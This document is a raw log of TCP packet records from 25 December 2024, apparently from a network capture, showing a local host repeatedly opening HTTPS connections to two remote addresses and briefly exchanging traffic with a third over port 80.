                                                                                                                                                                Dec 25, 2024 09:07:50.782574892 CET49815443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.782653093 CET49816443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:50.782653093 CET49817443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:50.782955885 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.783056021 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:50.783154011 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.783837080 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.783890009 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:50.784800053 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.784864902 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:50.784976959 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.785351992 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.785378933 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.474634886 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.474724054 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.475322008 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.475394011 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.477771997 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.477858067 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.478842974 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.478904963 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.496114969 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.496192932 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.496412992 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.496475935 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.496830940 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.499983072 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.500044107 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.500359058 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.500658989 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.501341105 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.543343067 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.547336102 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.384733915 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.384922981 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.384994984 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.385066032 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.385267973 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.385318041 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.385433912 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.385536909 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.385576010 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.385745049 CET49825443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:53.385780096 CET44349825142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.386399031 CET49826443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.386434078 CET44349826142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.386495113 CET49825443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:53.386647940 CET49826443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.386959076 CET49826443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.386970997 CET44349826142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.387273073 CET49825443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:53.387289047 CET44349825142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.456342936 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.456425905 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.456458092 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.456625938 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.457535982 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.457582951 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.457614899 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.457968950 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.460792065 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.460813999 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.461539030 CET49828443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.461541891 CET49827443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:53.461555958 CET44349828142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.461560011 CET44349827142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.461620092 CET49828443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.461683989 CET49827443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:53.463077068 CET49828443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.463087082 CET44349828142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.463979959 CET49827443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:53.463995934 CET44349827142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:54.782768965 CET49826443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:54.782799006 CET49825443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:54.782810926 CET49828443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:54.782838106 CET49827443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:54.783375978 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:54.783411026 CET44349831142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:54.784951925 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:54.785033941 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:54.785140038 CET44349832142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:54.785197020 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:54.785679102 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:54.785693884 CET44349831142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:54.785723925 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:54.785773993 CET44349832142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:55.916419983 CET804974569.42.215.252192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:55.916928053 CET4974580192.168.2.469.42.215.252
                                                                                                                                                                Dec 25, 2024 09:07:56.475977898 CET44349831142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:56.476114035 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:56.476869106 CET44349831142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:56.476917982 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:56.480391979 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:56.480401993 CET44349831142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:56.480629921 CET44349831142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:56.480936050 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:56.481390953 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:56.481504917 CET44349832142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:56.481667995 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:56.482588053 CET44349832142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:56.482709885 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:56.486073017 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:56.486099958 CET44349832142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:56.486521959 CET44349832142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:56.486689091 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:56.487046003 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:56.527347088 CET44349831142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:56.527363062 CET44349832142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.371597052 CET44349831142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.371715069 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.371726036 CET44349831142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.371810913 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.371916056 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.371949911 CET44349831142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.371993065 CET49831443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.372421980 CET49840443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.372454882 CET44349840142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.372575998 CET49840443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.372881889 CET49840443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.372894049 CET44349840142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.373821974 CET49841443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:57.373862028 CET44349841142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.373923063 CET49841443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:57.374188900 CET49841443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:57.374203920 CET44349841142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.376539946 CET44349832142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.376620054 CET44349832142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.376620054 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.376686096 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.376730919 CET49832443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.376770020 CET44349832142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.377091885 CET49842443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:57.377110958 CET44349842142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.377291918 CET49842443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:57.377458096 CET49843443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.377505064 CET44349843142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.377573967 CET49843443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.377578020 CET49842443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:57.377588034 CET44349842142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:57.377748013 CET49843443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:57.377782106 CET44349843142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:58.798245907 CET49840443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:58.798346996 CET49841443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:58.798352003 CET49842443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:58.798408031 CET49843443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:58.799341917 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:58.799387932 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:58.801028013 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:58.802397013 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:58.802402973 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:58.802428007 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:58.802438974 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:58.802809000 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:58.803081989 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:58.803097963 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:00.489737034 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:00.489799976 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:00.490387917 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:00.490447044 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:00.490747929 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:00.490823984 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:00.491399050 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:00.491539001 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:00.494843960 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:00.494854927 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:00.495066881 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:00.495120049 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:00.495480061 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:00.499990940 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:00.500000000 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:00.500224113 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:00.500732899 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:00.501262903 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:00.543338060 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:00.543374062 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.386663914 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.386964083 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.387902021 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.387933016 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.387959003 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.388334036 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.399806976 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.399945021 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.399966002 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.400132895 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.401470900 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.401501894 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.401527882 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.401771069 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.410217047 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.410238028 CET44349852142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.410267115 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.410295010 CET49852443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.411071062 CET49861443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:01.411098003 CET44349861142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.411279917 CET49861443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:01.411309958 CET49862443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.411344051 CET44349862142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.411542892 CET49851443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.411542892 CET49862443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.411556005 CET44349851142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.411904097 CET49862443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.411923885 CET44349862142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.412127972 CET49863443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:01.412136078 CET44349863142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.412318945 CET49863443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:01.412559986 CET49863443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:01.412570953 CET44349863142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.412605047 CET49864443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.412662983 CET44349864142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.412770033 CET49864443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.412985086 CET49861443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:01.412993908 CET44349861142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.413708925 CET49864443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.413738966 CET44349864142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:02.813700914 CET49862443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.813749075 CET49863443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:02.813760042 CET49861443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:02.813787937 CET49864443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.814140081 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.814202070 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:02.814604044 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.815588951 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.815622091 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:02.817164898 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.817177057 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:02.817249060 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.817945004 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:02.817955971 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.506887913 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.507019997 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.507760048 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.507915974 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.513297081 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.513313055 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.513509035 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.513544083 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.513606071 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.513614893 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.514162064 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.514202118 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.514250994 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.517656088 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.517659903 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.517854929 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.517925978 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.518291950 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:04.555347919 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:04.563323975 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.407766104 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.407936096 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.408006907 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.408276081 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.408288956 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.408332109 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.409048080 CET49870443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.409081936 CET44349870142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.409609079 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.409668922 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.409720898 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.411179066 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.411195040 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.413145065 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.413207054 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.413279057 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.413460970 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.413489103 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.417960882 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.418019056 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.418030977 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.418073893 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.418104887 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.418135881 CET44349871142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.418189049 CET49871443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.418659925 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.418741941 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.418836117 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.418898106 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.418912888 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.418962002 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.419261932 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:05.419272900 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:05.419636965 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:05.419671059 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.112653971 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.112716913 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.113261938 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.113276958 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.116274118 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.116281986 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.117651939 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.117718935 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.118172884 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.118246078 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.120717049 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.120735884 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.120950937 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.121037006 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.121324062 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.121732950 CET44349883142.250.181.14192.168.2.4
